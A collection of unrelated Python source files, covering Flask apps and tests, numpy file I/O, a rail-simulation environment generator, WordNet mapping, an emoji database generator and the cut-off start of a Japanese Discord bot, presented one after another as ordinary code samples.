from flask import Flask, render_template, redirect, url_for from flask_bootstrap import Bootstrap from flask_wtf import FlaskForm from wtforms import StringField, SubmitField from wtforms.validators import Required import csv app = Flask(__name__) app.config['DEBUG'] = True # Flask-WTF requires an enryption key - the string can be anything app.config['SECRET_KEY'] = '8BYkEfBA6O6donzWlSihBXox7C0sKR6b' # Flask-Bootstrap requires this line Bootstrap(app) # --------------------------------------------------------------------------- # with Flask-WTF, each web form is represented by a class # "RestForm" can be changed; "(FlaskForm)" cannot # see the route for "/" to see how this is used class RestForm(FlaskForm): restaurant = StringField('Restaurant name', validators=[Required()]) submit = SubmitField('Submit') # Exercise: # add: address, city, state, zip, phone, url, cuisine, price_range # make price_range a select element with choice of $ to $$$$ # make all fields required except submit # --------------------------------------------------------------------------- # all Flask routes below @app.route('/', methods=['GET', 'POST']) def index(): form = RestForm() # Exercise: # Make the form write a new row into restaurants.csv # with if form.validate_on_submit() return render_template('index.html', form=form) @app.route('/restaurants') def restaurants(): csvfile = open('restaurants.csv', newline='') myreader = csv.reader(csvfile, delimiter=',') list_of_rows = [] for row in myreader: list_of_rows.append(row) csvfile.close() return render_template('rest.html',rests=list_of_rows) # keep this as is if __name__ == '__main__': app.run(debug=True)
1,737
530
#!/usr/bin/env python """ io_tools Functions to load data """ from __future__ import absolute_import import os import sys import json import numpy as np __author__ = "Xin Wang" __email__ = "wangxin@nii.ac.jp" __copyright__ = "Copyright 2020, Xin Wang" def f_read_raw_mat(filename, col, data_format='f4', end='l'): """read_raw_mat(filename,col,data_format='float',end='l') Read the binary data from filename Return data, which is a (N, col) array filename: the name of the file, take care about '\\' col: the number of column of the data format: please use the Python protocal to write format default: 'f4', float32 see for more format: end: little endian 'l' or big endian 'b'? default: 'l' dependency: numpy Note: to read the raw binary data in python, the question is how to interprete the binary data. We can use struct.unpack('f',read_data) to interprete the data as float, however, it is slow. """ f = open(filename,'rb') if end=='l': data_format = '<'+data_format elif end=='b': data_format = '>'+data_format else: data_format = '='+data_format datatype = np.dtype((data_format,(col,))) data = np.fromfile(f,dtype=datatype) f.close() if data.ndim == 2 and data.shape[1] == 1: return data[:,0] else: return data def f_read_raw_mat_length(filename, data_format='f4'): """f_read_raw_mat_length(filename,data_format='float',end='l') Read length of data """ f = open(filename,'rb') tmp = f.seek(0, 2) bytes_num = f.tell() f.close() if data_format == 'f4': return int(bytes_num / 4) else: return bytes_num def f_read_htk(filename, data_format='f4', end='l'): """read_htk(filename, data_format='f4', end='l') Read HTK File and return the data as numpy.array filename: input file name data_format: the data_format of the data default: 'f4' float32 end: little endian 'l' or big endian 'b'? default: 'l' """ if end=='l': data_format = '<'+data_format data_formatInt4 = '<i4' data_formatInt2 = '<i2' elif end=='b': data_format = '>'+data_format data_formatInt4 = '>i4' data_formatInt2 = '>i2' else: data_format = '='+data_format data_formatInt4 = '=i4' data_formatInt2 = '=i2' head_type = np.dtype([('nSample',data_formatInt4), ('Period',data_formatInt4), ('SampleSize',data_formatInt2), ('kind',data_formatInt2)]) f = open(filename,'rb') head_info = np.fromfile(f,dtype=head_type,count=1) """if end=='l': data_format = '<'+data_format elif end=='b': data_format = '>'+data_format else: data_format = '='+data_format """ if 'f' in data_format: sample_size = int(head_info['SampleSize'][0]/4) else: print("Error in read_htk: input should be float32") return False datatype = np.dtype((data_format,(sample_size,))) data = np.fromfile(f,dtype=datatype) f.close() return data def f_read_htk_length(filename, data_format='f4', end='l'): """read_htk(filename, data_format='f4', end='l') Read HTK File and return the data as numpy.array filename: input file name data_format: the data_format of the data default: 'f4' float32 end: little endian 'l' or big endian 'b'? default: 'l' """ if end=='l': data_format = '<'+data_format data_formatInt4 = '<i4' data_formatInt2 = '<i2' elif end=='b': data_format = '>'+data_format data_formatInt4 = '>i4' data_formatInt2 = '>i2' else: data_format = '='+data_format data_formatInt4 = '=i4' data_formatInt2 = '=i2' head_type = np.dtype([('nSample',data_formatInt4), ('Period',data_formatInt4), ('SampleSize',data_formatInt2), ('kind',data_formatInt2)]) f = open(filename,'rb') head_info = np.fromfile(f,dtype=head_type,count=1) f.close() sample_size = int(head_info['SampleSize'][0]/4) return sample_size def f_write_raw_mat(data,filename,data_format='f4',end='l'): """write_raw_mat(data,filename,data_format='',end='l') Write the binary data from filename. Return True data: np.array filename: the name of the file, take care about '\\' data_format: please use the Python protocal to write data_format default: 'f4', float32 end: little endian 'l' or big endian 'b'? default: '', only when data_format is specified, end is effective dependency: numpy Note: we can also write two for loop to write the data using f.write(data[a][b]), but it is too slow """ if not isinstance(data, np.ndarray): print("Error write_raw_mat: input shoul be np.array") return False f = open(filename,'wb') if len(data_format)>0: if end=='l': data_format = '<'+data_format elif end=='b': data_format = '>'+data_format else: data_format = '='+data_format datatype = np.dtype(data_format) temp_data = data.astype(datatype) else: temp_data = data temp_data.tofile(f,'') f.close() return True def f_write_htk(data,targetfile,sampPeriod=50000,sampKind=9,data_format='f4',end='l'): """ write_htk(data,targetfile, sampPeriod=50000,sampKind=9,data_format='f4',end='l') """ if data.ndim==1: nSamples, vDim = data.shape[0], 1 else: nSamples, vDim = data.shape if data_format=='f4': sampSize = vDim * 4; else: sampSize = vDim * 8; f = open(targetfile,'wb') if len(data_format)>0: if end=='l': data_format1 = '<i4' data_format2 = '<i2' elif end=='b': data_format1 = '>i4' data_format2 = '>i2' else: data_format1 = '=i4' data_format2 = '=i2' temp_data = np.array([nSamples, sampPeriod], dtype=np.dtype(data_format)) temp_data.tofile(f, '') temp_data = np.array([sampSize, sampKind], dtype=np.dtype(data_format2)) temp_data.tofile(f, '') if len(data_format)>0: if end=='l': data_format = '<'+data_format elif end=='b': data_format = '>'+data_format else: data_format = '='+data_format datatype = np.dtype(data_format) temp_data = data.astype(datatype) else: temp_data = data temp_data.tofile(f, '') f.close() return True def read_dic(file_path): """ dic = read_dic(file_path) Read a json file from file_path and return a dictionary Args: file_path: string, path to the file Returns: dic: a dictionary """ try: data = json.load( open(file_path) ) except IOError: print("Cannot find %s" % (file_path)) sys.exit(1) except json.decoder.JSONDecodeError: print("Cannot parse %s" % (file_path)) sys.exit(1) return data def write_dic(dic, file_path): """ write_dic(dic, file_path) Write a dictionary to file Args: dic: dictionary to be dumped file_path: file to store the dictionary """ try: json.dump(dic, open(file_path, 'w')) except IOError: print("Cannot write to %s " % (file_path)) sys.exit(1) def file_exist(file_path): """ file_exit(file_path) Whether file exists """ return os.path.isfile(file_path) or os.path.islink(file_path)
8,015
2,704
import logging import random from typing import NamedTuple from flatland.envs.malfunction_generators import malfunction_from_params # from flatland.envs.rail_env import RailEnv from envs.flatland.utils.gym_env_wrappers import FlatlandRenderWrapper as RailEnv from flatland.envs.rail_generators import sparse_rail_generator from flatland.envs.schedule_generators import sparse_schedule_generator MalfunctionParameters = NamedTuple('MalfunctionParameters', [('malfunction_rate', float), ('min_duration', int), ('max_duration', int)]) def random_sparse_env_small(random_seed, max_width, max_height, observation_builder): random.seed(random_seed) size = random.randint(0, 5) width = 20 + size * 5 height = 20 + size * 5 nr_cities = 2 + size // 2 + random.randint(0, 2) nr_trains = min(nr_cities * 5, 5 + random.randint(0, 5)) # , 10 + random.randint(0, 10)) max_rails_between_cities = 2 max_rails_in_cities = 3 + random.randint(0, size) malfunction_rate = 30 + random.randint(0, 100) malfunction_min_duration = 3 + random.randint(0, 7) malfunction_max_duration = 20 + random.randint(0, 80) rail_generator = sparse_rail_generator(max_num_cities=nr_cities, seed=random_seed, grid_mode=False, max_rails_between_cities=max_rails_between_cities, max_rails_in_city=max_rails_in_cities) # new version: # stochastic_data = MalfunctionParameters(malfunction_rate, malfunction_min_duration, malfunction_max_duration) stochastic_data = {'malfunction_rate': malfunction_rate, 'min_duration': malfunction_min_duration, 'max_duration': malfunction_max_duration} schedule_generator = sparse_schedule_generator({1.: 0.25, 1. / 2.: 0.25, 1. / 3.: 0.25, 1. / 4.: 0.25}) while width <= max_width and height <= max_height: try: env = RailEnv(width=width, height=height, rail_generator=rail_generator, schedule_generator=schedule_generator, number_of_agents=nr_trains, malfunction_generator_and_process_data=malfunction_from_params(stochastic_data), obs_builder_object=observation_builder, remove_agents_at_target=False) print("[{}] {}x{} {} cities {} trains, max {} rails between cities, max {} rails in cities. Malfunction rate {}, {} to {} steps.".format( random_seed, width, height, nr_cities, nr_trains, max_rails_between_cities, max_rails_in_cities, malfunction_rate, malfunction_min_duration, malfunction_max_duration )) return env except ValueError as e: logging.error(f"Error: {e}") width += 5 height += 5 logging.info("Try again with larger env: (w,h):", width, height) logging.error(f"Unable to generate env with seed={random_seed}, max_width={max_height}, max_height={max_height}") return None
3,000
958
from rest_framework import permissions from models import Bucketlist class IsOwnerOrReadOnly(permissions.BasePermission): """ Object-level permission to only allow owners of an object to edit it. """ def has_object_permission(self, request, view, obj): """ Read permissions are allowed to any request, so we'll always allow GET, HEAD or OPTIONS requests. """ if request.method in permissions.SAFE_METHODS: return True if isinstance(obj, Bucketlist): return obj.created_by == request.user else: return obj
616
161
# -*- coding: utf-8 -*- import json import glob import os from . import config def get_presets(): '''Get a generator yielding preset name, data pairs''' for path in config.PRESETS_PATH: for f in glob.glob(os.path.join(path, '*.json')): base = os.path.basename(f) name = os.path.splitext(base)[0] with open(f, 'r') as f: data = json.loads(f.read()) yield name, data def get_preset(name): '''Get a preset by name''' for n, s in get_presets(): if name == n: return s def find_preset(name): '''Find the path to a given preset...''' for path in config.PRESETS_PATH: prospect = os.path.join(path, name + '.json') if os.path.isfile(prospect): return prospect raise ValueError('Could not find a preset named %s', name) def new_preset(name, data): '''Create a new preset from viewport state data :param name: Name of the preset :param data: Viewport state dict usage:: import mvp active = mvp.Viewport.active() mvp.new_preset('NewPreset1', active.get_state()) ''' preset_path = os.path.join(config.PRESETS_PATH[0], name + '.json') with open(preset_path, 'w') as f: f.write(json.dumps(data)) def del_preset(name): preset_path = find_preset(name) if os.path.exists(preset_path): os.remove(preset_path)
1,438
492
# -*- coding: utf-8 -*- """Tests for Flask-CuttlePool.""" import pytest from flask import Flask # Find the stack on which we want to store the database connection. # Starting with Flask 0.9, the _app_ctx_stack is the correct one, # before that we need to use the _request_ctx_stack. try: from flask import _app_ctx_stack as stack except ImportError: from flask import _request_ctx_stack as stack import mocksql from flask_cuttlepool import (_CAPACITY, _OVERFLOW, _TIMEOUT, CuttlePool, FlaskCuttlePool, PoolConnection) @pytest.fixture def user(): return 'paul_hollywood' @pytest.fixture def password(): return 'bread_is_the_best' @pytest.fixture def host(): return 'an_ip_address_in_england' @pytest.fixture def user2(): return 'marry_berry' @pytest.fixture def password2(): return 'cake_and_margaritas' @pytest.fixture def host2(): return 'another_ip_address_in_england' def create_app(u, p, h): app = Flask(__name__) app.testing = True app.config.update( CUTTLEPOOL_USER=u, CUTTLEPOOL_PASSWORD=p, CUTTLEPOOL_HOST=h ) return app @pytest.fixture def app(user, password, host): """A Flask ``app`` instance.""" return create_app(user, password, host) @pytest.fixture def app2(user2, password2, host2): """A Flask ``app`` instance.""" return create_app(user2, password2, host2) def add_decorators(p): """Adds ping and normalize decorators to pool.""" @p.ping def ping(con): return True @p.normalize_connection def normalize(con): pass @pytest.fixture def pool_no_app(): """Pool with no app.""" p = FlaskCuttlePool(mocksql.connect) add_decorators(p) return p @pytest.fixture(params=[1, 2]) def pool_one(request, app): """Pool initialized with one app.""" if request.param == 1: # Pool initialized with app in __init__() only. pool = FlaskCuttlePool(mocksql.connect, app=app) elif request.param == 2: # Pool initialized with app in init_app() only. pool = FlaskCuttlePool(mocksql.connect) pool.init_app(app) add_decorators(pool) return pool @pytest.fixture(params=[1, 2]) def pool_two(request, app, app2): """Pool initialized with two apps.""" if request.param == 1: # Pool initialized with one app in __init__() and one app in # init_app(). pool = FlaskCuttlePool(mocksql.connect, app=app) pool.init_app(app2) elif request.param == 2: # Pool initialized with two apps in init_app() only. pool = FlaskCuttlePool(mocksql.connect) pool.init_app(app) pool.init_app(app2) add_decorators(pool) return pool def test_init_no_app(user, password, host): """Test FlaskCuttlePool instantiates properly without an app object.""" pool = FlaskCuttlePool(mocksql.connect, user=user, password=password, host=host) add_decorators(pool) assert isinstance(pool, FlaskCuttlePool) assert pool._cuttlepool_kwargs['capacity'] == _CAPACITY assert pool._cuttlepool_kwargs['overflow'] == _OVERFLOW assert pool._cuttlepool_kwargs['timeout'] == _TIMEOUT assert pool._cuttlepool_kwargs['user'] == user assert pool._cuttlepool_kwargs['password'] == password assert pool._cuttlepool_kwargs['host'] == host def test_init_with_app(app, pool_one, user, password, host): """Test FlaskCuttlePool instantiates properly with an app object.""" assert isinstance(pool_one, FlaskCuttlePool) assert pool_one._cuttlepool_kwargs['capacity'] == _CAPACITY assert pool_one._cuttlepool_kwargs['overflow'] == _OVERFLOW assert pool_one._cuttlepool_kwargs['timeout'] == _TIMEOUT def test_init_two_pools_one_app(app): """Test two pools can be used with one app object.""" pool1 = FlaskCuttlePool(mocksql.connect, app=app) add_decorators(pool1) pool2 = FlaskCuttlePool(mocksql.connect, app=app) add_decorators(pool2) assert pool1.get_pool() is not pool2.get_pool() def test_get_app_no_init(app): """ Tests the ``app`` is returned when ``app`` is only passed to pool ``__init__()``. """ pool = FlaskCuttlePool(mocksql.connect, app=app) add_decorators(pool) # Test in app context. with app.app_context(): assert pool._get_app() is app # Test outside app context. assert pool._get_app() is app def test_get_app_multiple(pool_two, app, app2): """Tests the correct ``app`` is returned.""" with app.app_context(): assert pool_two._get_app() is app with app2.app_context(): assert pool_two._get_app() is app2 def test_get_app_no_app(): """Tests an error is raised when there is no app.""" pool = FlaskCuttlePool(mocksql.connect) add_decorators(pool) with pytest.raises(RuntimeError): pool._get_app() def test_get_pool(pool_two, app, app2): """Tests the proper pool is retreived.""" with app.app_context(): pool = pool_two.get_pool() # Ensure same pool is returned again. with app.app_context(): assert pool is pool_two.get_pool() # Ensure different pool for different app. with app2.app_context(): assert pool is not pool_two.get_pool() def test_get_pool_different_apps_and_pools(app, app2): """ Tests that connection pools are stored correctly for each pool, app pair. """ pool1 = FlaskCuttlePool(mocksql.connect, app=app) add_decorators(pool1) # Create another pool with a different app. The call to get_pool() by # pool1 should attempt to retrieve the pool set by pool2 and fail. pool2 = FlaskCuttlePool(mocksql.connect, app=app2) add_decorators(pool2) with app2.app_context(): with pytest.raises(RuntimeError): pool1.get_pool() def test_make_pool(app, user, password, host): """Tests _make_pool method.""" pool = FlaskCuttlePool(mocksql.connect) add_decorators(pool) p = pool._make_pool(app) assert isinstance(p, CuttlePool) con_args = p.connection_arguments assert con_args['user'] == user assert con_args['password'] == password assert con_args['host'] == host def test_get_connection(app, pool_one): """Test get_connection returns a connection.""" with app.app_context(): con = pool_one.get_connection() assert isinstance(con, PoolConnection) def test_connection_app_ctx(app, pool_one): """Tests the same connection is retrieved from the stack.""" with app.app_context(): con1 = pool_one.connection assert hasattr(stack.top, 'cuttlepool_connection') con2 = pool_one.connection assert con1 is con2 assert pool_one.connection is None def test_connection_after_close(app, pool_one): """Ensure connection property properly handles closed connections.""" with app.app_context(): con = pool_one.connection con.close() assert con is not pool_one.connection assert pool_one.connection.open def test_connection_multiple_app_ctx(app, pool_one): """ Tests connection property saves a different connection to coexisting app contexts. """ with app.app_context(): con1 = pool_one.connection with app.app_context(): con2 = pool_one.connection assert con1 is not con2 assert con1 is pool_one.connection def test_commit(app, pool_one): """Tests the commit convenience method.""" with app.app_context(): commit1 = pool_one.connection.commit() commit2 = pool_one.commit() assert commit1 is not commit2 assert commit1 == commit2 def test_commit_error(app, pool_one): """ Tests a RuntimeError is raised when there's no connection on the application context. """ with pytest.raises(RuntimeError): # Should raise error since there's no application context. pool_one.commit() with app.app_context(): with pytest.raises(RuntimeError): # Should raise error since there's no connection on the application # context. pool_one.commit() def test_cursor(app, pool_one): """Tests a cursor is returned.""" with app.app_context(): cur = pool_one.cursor() assert isinstance(cur, mocksql.MockCursor) def test_cursor_accepts_arguments(app, pool_one): """Tests a cursor can accept arguments.""" class SuperMockCursor(mocksql.MockCursor): pass with app.app_context(): cur = pool_one.cursor(cursorclass=SuperMockCursor) assert isinstance(cur, SuperMockCursor) def test_ping_decorator(app, pool_one): """Tests the ping decorator is used by the connection pool.""" ping_str = "Decorated ping" @pool_one.ping def ping(connection): return ping_str with app.app_context(): pool = pool_one.get_pool() assert pool.ping(None) is ping_str def test_normalize_connection_decorator(app, pool_one): """ Tests the normalize_connection decorator is used by the connection pool. """ @pool_one.normalize_connection def normalize_connection(connection): connection.append(1) con = [] with app.app_context(): pool = pool_one.get_pool() pool.normalize_connection(con) # Check if con is modified by normalize_connection. If it is that # means the callback was successfully used by the connection pool. assert len(con) == 1 assert con[0] == 1
9,539
3,052
from typing import List, Dict from ..utils.scoringHelpers import * def listToResult(l: List[int]) -> List[Dict[str, int]]: return [{"position": item} for item in l] class Test_countOccurancesOfPosition: def test_noData(self) -> None: assert occuracesOfPosition([], False) == 0 assert occuracesOfPosition([], -5) == 0 assert occuracesOfPosition([], 1) == 0 assert occuracesOfPosition([], 55) == 0 def test_noOccurances(self) -> None: assert occuracesOfPosition(listToResult([5, 4, 3, 2]), 1) == 0 assert occuracesOfPosition(listToResult([55, 66]), 1) == 0 assert occuracesOfPosition(listToResult([8, 9, 3, 7, 3]), 1) == 0 def test_occursInList(self) -> None: assert occuracesOfPosition(listToResult([5, 4, 3, 2, 1]), 1) == 1 assert occuracesOfPosition(listToResult([1, 2, 3, 5, 1]), 1) == 2 assert occuracesOfPosition(listToResult([1, 1, 2, 1, 2]), 1) == 3 assert occuracesOfPosition(listToResult([5, 4, 3, 2, 1]), 2) == 1 assert occuracesOfPosition(listToResult([1, 2, 3, 5, 1]), 2) == 1 assert occuracesOfPosition(listToResult([1, 1, 2, 1, 2]), 2) == 2 assert occuracesOfPosition(listToResult([5, 4, 3, 2, 10]), 10) == 1 assert occuracesOfPosition(listToResult([10, 2, 3, 10]), 10) == 2 assert occuracesOfPosition(listToResult([10, 10, 10, 2]), 10) == 3 class Test_calculateCourseStatistics: def test_noData(self) -> None: assert calculateCourseStatistics([]) == {} def test_oneResult(self) -> None: assert calculateCourseStatistics( [{"course": "red", "time": 5, "incomplete": False, "position": 1}] ) == {"red": {"average": 5, "standardDeviation": 0}} def test_twoResults(self) -> None: results = [ {"course": "red", "time": 4, "incomplete": False, "position": 1}, {"course": "red", "time": 8, "incomplete": False, "position": 1}, ] assert calculateCourseStatistics(results)["red"]["average"] == 6 assert ( round(calculateCourseStatistics(results)["red"]["standardDeviation"]) == 3 ) class Test_calculateCourseTop3Average: def test_noData(self) -> None: assert calculateCourseTop3Average([]) == {} def test_oneResult(self) -> None: assert ( calculateCourseTop3Average( [{"course": "red", "time": 5, "incomplete": False, "position": 1}] )["red"] == 5 ) def test_twoResults(self) -> None: results = [ {"course": "red", "time": 4, "incomplete": False, "position": 1}, {"course": "red", "time": 8, "incomplete": False, "position": 1}, ] assert calculateCourseTop3Average(results)["red"] == 6 def test_threeResults(self) -> None: results = [ {"course": "red", "time": 4, "incomplete": False, "position": 1}, {"course": "red", "time": 8, "incomplete": False, "position": 1}, {"course": "red", "time": 12, "incomplete": False, "position": 1}, ] assert calculateCourseTop3Average(results)["red"] == 8 def test_fiveResults(self) -> None: results = [ {"course": "red", "time": 4, "incomplete": False, "position": 1}, {"course": "red", "time": 8, "incomplete": False, "position": 1}, {"course": "red", "time": 12, "incomplete": False, "position": 1}, {"course": "red", "time": 65, "incomplete": False, "position": 1}, {"course": "red", "time": 155, "incomplete": False, "position": 1}, ] assert calculateCourseTop3Average(results)["red"] == 8 def test_fiveResultsRandomOrder(self) -> None: results = [ {"course": "red", "time": 12, "incomplete": False, "position": 1}, {"course": "red", "time": 8, "incomplete": False, "position": 1}, {"course": "red", "time": 155, "incomplete": False, "position": 1}, {"course": "red", "time": 4, "incomplete": False, "position": 1}, {"course": "red", "time": 65, "incomplete": False, "position": 1}, ] assert calculateCourseTop3Average(results)["red"] == 8 class Test_getMultiplier: def test_runningStandardCourse(self) -> None: assert getMultiplier("M10", "YELLOW") == 1000 assert getMultiplier("W12", "ORANGE") == 1000 assert getMultiplier("M14", "LIGHT GREEN") == 1000 assert getMultiplier("W16", "GREEN") == 1000 assert getMultiplier("M18", "Brown") == 1000 assert getMultiplier("W20", "BLUE") == 1000 assert getMultiplier("M21", "BROWN") == 1000 assert getMultiplier("W35", "BLUE") == 1000 assert getMultiplier("M40", "BROWN") == 1000 assert getMultiplier("W45", "SHORT BLUE") == 1000 assert getMultiplier("M50", "SHORT BROWN") == 1000 assert getMultiplier("W55", "GREEN") == 1000 assert getMultiplier("M60", "BLUE") == 1000 assert getMultiplier("W65", "SHORT GREEN") == 1000 assert getMultiplier("M70", "GREEN") == 1000 assert getMultiplier("W75", "SHORT GREEN") == 1000 assert getMultiplier("M80", "SHORT GREEN") == 1000 def test_runningUp(self) -> None: assert getMultiplier("W10", "ORANGE") == 1200 assert getMultiplier("M12", "LIGHT GREEN") == 1200 assert getMultiplier("W14", "GREEN") == 1210 assert getMultiplier("M16", "BROWN") == 1210 assert getMultiplier("W18", "BLACK") == 1452 assert getMultiplier("M20", "BLACK") == 1200 assert getMultiplier("W21", "BLACK") == 1200 assert getMultiplier("M35", "BLACK") == 1200 assert getMultiplier("W40", "BROWN") == 1210 assert getMultiplier("M45", "BROWN") == 1100 assert getMultiplier("W50", "BROWN") == 1331 assert getMultiplier("M55", "SHORT BROWN") == 1100 assert getMultiplier("W60", "SHORT BLUE") == 1100 assert getMultiplier("M65", "BROWN") == 1331 assert getMultiplier("W70", "BLUE") == 1331 assert getMultiplier("M75", "GREEN") == 1100 assert getMultiplier("W80", "BLACK") == 1933 def test_badAgeClass(self) -> None: assert getMultiplier("W", "BROWN") == 1000 assert getMultiplier("M", "BROWN") == 1000 assert getMultiplier("WA", "BROWN") == 1000 assert getMultiplier("MWERR", "BROWN") == 1000 assert getMultiplier("", "BROWN") == 1000
6,516
2,416
import sys from stiff.data.constants import UNI_POS_WN_MAP from finntk.wordnet.reader import get_en_fi_maps from finntk.wordnet.utils import pre_id_to_post, ss2pre def lemmas_from_instance(wn, instance): word = instance.attrib["lemma"] pos = UNI_POS_WN_MAP[instance.attrib["pos"]] lemmas = wn.lemmas(word, pos=pos) return word, pos, lemmas def write_lemma(keyout, inst_id, lemma): fi2en, en2fi = get_en_fi_maps() if lemma is None: guess = "U" else: chosen_synset_fi_id = ss2pre(lemma.synset()) if chosen_synset_fi_id not in fi2en: sys.stderr.write( "No fi2en mapping found for {} ({})\n".format( chosen_synset_fi_id, lemma ) ) guess = "U" else: guess = pre_id_to_post(fi2en[chosen_synset_fi_id]) keyout.write("{} {}\n".format(inst_id, guess))
911
330
# import sqlite3 from sqlalchemy import create_engine from sqlalchemy.orm import scoped_session, sessionmaker from sqlalchemy.ext.declarative import declarative_base from .config import _cfg, _cfgi # engine = create_engine(_cfg('connection-string'), module=sqlite3.dbapi2) engine = create_engine(_cfg('connection-string')) db = scoped_session(sessionmaker(autocommit=False, autoflush=False, bind=engine)) Base = declarative_base() Base.query = db.query_property() def init_db(): import fosspay.objects Base.metadata.create_all(bind=engine)
553
175
import argparse import os from datetime import datetime import requests JSON_DB_FILE = 'https://raw.githubusercontent.com/github/gemoji/master/db/emoji.json' def generate(path, dbname): req = requests.get(JSON_DB_FILE) req.raise_for_status() data = req.json() path = os.path.join(path, dbname) with open(path, 'w') as file: file.write('### This is a generated file.\n') file.write('### Do not edit this file.\n') file.write('### Date: {0}\n'.format(datetime.now().isoformat()[:-7])) file.write('### This file is based on "{0}".\n'.format(JSON_DB_FILE)) file.write('\n') file.write('from collections import namedtuple\n') file.write('\n') file.write('Emoji = namedtuple("Emoji", ["aliases", "emoji", "tags", "category"])\n') file.write('\n') file.write('EMOJI_DB = [\n') for emoji in data: if 'emoji' in emoji: file.write(' Emoji({aliases}, "{emoji}", {tags}, "{category}"),\n'.format(**{ 'aliases': emoji['aliases'], 'emoji': emoji['emoji'], 'tags': emoji['tags'], 'category': emoji['category'], })) file.write(']\n') if __name__ == '__main__': parser = argparse.ArgumentParser(description='Generates the Emoji database.') parser.add_argument('--dir', default='.', help='Database location') parser.add_argument('--dbname', default='db.py', help='Database location') args = parser.parse_args() generate(args.dir, args.dbname)
1,600
522
from .Command import Command class WWW(Command): command = 'www' help = "Spin up http server" def set_args(self, subparser): subparser.add_argument("--port","-P", help="Port number to listen on", type=int, default=5000) def run(self, args): import logging import mimetypes import os import flask import jinja2 from ..Database import Database from ..HTMLBib import bibContext, authorNorm from ..Exceptions import UserException from ..Bibtex import unicodeNorm if not args.debug: logging.getLogger('werkzeug').setLevel(logging.ERROR) Database(dataDir=args.data_dir) flaskApp = flask.Flask("pdfs") flaskApp.jinja_env.trim_blocks = True flaskApp.jinja_env.lstrip_blocks = True flaskApp.jinja_loader=jinja2.PackageLoader("pdfs") def mkTagList(db): if db.tags: return ' '.join('<a class="tags" href="/tag/{0}">{0}</a>'.format(t) for t in sorted(db.tags)) def keySort(xs): return sorted(xs, key=lambda x: x.key()) def doSearch(tag=None, text=None, author=None, title=None): db = Database(dataDir=args.data_dir) ctx = dict(article_dir=os.path.basename(os.path.dirname(db.dataDir)), tags=mkTagList(db)) if tag: ctx['entries'] = bibContext(keySort(filter(lambda x: tag in x.tags, db.works))) ctx['search'] = "tag:" + tag elif text: entries, searchData = [], [] for result in db.search(text, formatter="html"): entries.append(result['entry']) searchData.append(result) bctx = bibContext(entries) for c,r in zip(bctx,searchData): c['searchTxt'] = dict(score=r['score'], frags=r['frags']) ctx['entries'] = bctx[::-1] ctx['search'] = "text:" + text elif author: def isAuth(e): n, au, ed = set(), e.author(), e.editor() if au: n.update(authorNorm(x.split(', ')[0]) for x in au.split(' and ')) if ed: n.update(authorNorm(x.split(', ')[0]) for x in ed.split(' and ')) return author in n matches = keySort(filter(isAuth, db.works)) ctx['entries'] = bibContext(matches) ctx['search'] = "author:" + author elif title: def m(x): return title.lower() in unicodeNorm(x.title()).lower() ctx['entries'] = bibContext(keySort(filter(m, db.works))) ctx['search'] = "title:" + title else: ctx['entries'] = bibContext(keySort(db.works)) return ctx @flaskApp.route('/') def listFiles(): return flask.render_template('bibliography.html', **doSearch()) @flaskApp.route('/search') def searchFiles(): query=flask.request.args.get('q', '') queryType=flask.request.args.get('t', '') if queryType == "text": ctx = doSearch(text=query) elif queryType == "author": ctx = doSearch(author=query) elif queryType == "title": ctx = doSearch(title=query) elif queryType == "tag": ctx = doSearch(tag=query) else: raise RuntimeError("got bad query {}:{}".format(queryType, query)) return flask.render_template('bibliography.html', **ctx) @flaskApp.route('/author/<author>') def listFilesByAuthor(author): return flask.render_template('bibliography.html', **doSearch(author=author)) @flaskApp.route('/tag/<tag>') def listFilesByTag(tag): return flask.render_template('bibliography.html', **doSearch(tag=tag)) @flaskApp.route('/<key>.pdf') def getPdf(key): db = Database(dataDir=args.data_dir) try: pdfFile = next(filter(lambda x: x.key() == key, db.works)).files[0] except StopIteration: raise KeyError resp = flask.make_response(open(os.path.join(db.dataDir, pdfFile), "rb").read()) resp.content_type = 'application/pdf' return resp @flaskApp.route('/attachment/<string:key>-<int:idx>.<string:ext>') def getAttached(key, idx, ext): db = Database(dataDir=args.data_dir) try: attFile = next(filter(lambda x: x.key() == key, db.works)).files[idx] except StopIteration: raise KeyError filePath = os.path.join(db.dataDir, attFile) resp = flask.make_response(open(filePath, "rb").read()) mime, _ = mimetypes.guess_type(filePath) resp.content_type = mime or 'application/octet-stream' return resp @flaskApp.route('/<key>.bib') def getBib(key): db = Database(dataDir=args.data_dir) e = db.find(key=key) resp = flask.make_response(e.bibtex) resp.content_type = 'text/plain' return resp try: flaskApp.run(port=args.port) except OSError as err: if 'Address already in use' in str(err): raise UserException("Port {} already in use.".format(args.port)) else: raise
5,653
1,613
# スクリプト名:nessmado_function.py # バージョン:5.01 # 作成日:2019/03/xx # 最終更新日:2019/10/14 # 作成者:(へっへ) # スクリプト概要: # |キャラ対策チャンネル(大元)に「質問」から始まるメッセージを投稿すると、 # |各キャラ別の対策チャンネルに文言をコピーした上で、 # |大元のキャラ対策チャンネルと雑談チャンネルに周知メッセージを送る。 """更新履歴 2019/03/xx ver 3.0?覚えてない。 オブジェクト指向に沿ってクラス化。 2019/07/31 Ver 5.0 勇者追加。 2019/10/14 Ver 5.1 バンカズ追加。 NESS_SKILLクラス考慮。 """ # discordAPIモジュール from discord import message from discord import client from discord import channel # 自作モジュール from NMconfig import NMConfig class ChannelManager: def __init__(self): self.nmconfig = NMConfig() self.TOKEN = "" self.ZATSUDAN_CHANNEL_ID = "" self.CHARACTER_TAISAKU_ID = "" # 「対策」は英語で"counterplan"って言うらしいが分かりにくいので self.MATCH_CHANNEL_ID = "" self.TAISAKU_STAMP = "" self.NESS_SKILL_CHANNEL_ID = "" self.STARVED_MATCHING = "" self.MYCHARACTER = "" self.inputConfig() def inputConfig(self): self.TOKEN = self.nmconfig.TOKEN self.ZATSUDAN_CHANNEL_ID = self.nmconfig.ZATSUDAN_CHANNEL_ID self.CHARACTER_TAISAKU_ID = self.nmconfig.CHARACTER_TAISAKU_ID self.MATCH_CHANNEL_ID = self.nmconfig.MATCH_CHANNEL_ID self.TAISAKU_STAMP = self.nmconfig.TAISAKU_STAMP self.NESS_SKILL_CHANNEL_ID = self.nmconfig.NESS_SKILL_CHANNEL_ID self.STARVED_MATCHING = self.nmconfig.STARVED_MATCHING self.MYCHARACTER = self.nmconfig.MYCHARACTER def judgeNameContained(self, client, ch_name, content) -> bool: """ キャラクター名について、包括してしまっている名前はいい感じに振り分けしてくれる処理。 TO:DO本当はさ、もっとスッキリ書けることなんてわかってるんだよ。でもさ、メンドかったんだよ。許してくれな。 """ if ch_name == 'マリオ': if ('ドクター' in content) or ('Dr' in content) or ('dr' in content): return False elif 